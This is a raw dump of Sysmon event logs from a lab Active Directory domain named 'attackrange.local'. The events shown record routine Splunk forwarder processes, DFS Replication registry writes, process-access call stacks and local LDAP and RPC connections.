
13241300x80000000000000001051737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.543{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001051736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.543{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 23542300x80000000000000001051735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4777CA860206E711B474441468C148CB,SHA256=72FB7D68192E8586F06B6D0C4D25DEB33C35E311D120517CE55B04E1793551A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.459{466BC892-F63C-60EB-957D-00000000CF01}76769832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:52.206{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.206{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.191{466BC892-F63C-60EB-957D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.722{466BC892-F63D-60EB-977D-00000000CF01}48284580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9160E941921FD50BC229B6B420607DC,SHA256=54BA87326781B4B7ABA08EB6B506FAF5D82DCAD170F00AF22A85DE6F5539FF76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:53.015{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A4695754B5C3979403FA136725C93C,SHA256=85D877618B8B0B52C794670DCE101D9FBC28FA0DD27653BDC7D357A91E1EA519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.559{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=652E0604C55199A6CD7E43AE1607F6A7,SHA256=50EA05E4C0DA867D086B93FE9A26924FA189D38601BD94EAD3E26E3AB5A477F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.521{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:53.505{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.505{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:53.506{466BC892-F63D-60EB-977D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.622{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD0164F8FD546422FEE195AD3A312353,SHA256=5BAC97F44B67FE1A77DC7D2305DF0242A69DB7DD0BC9534E79C9036F43E2C531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:54.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B887F6157F36D9D7DF04141103789F1,SHA256=F91C7CF1CDCD93346BD1B016C64D6CB374104445DBF7876FF20B09F6DE4F6ACF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.099{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51117-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.099{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51117-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.074{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51116-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.074{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51116-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001051766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:54.021{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
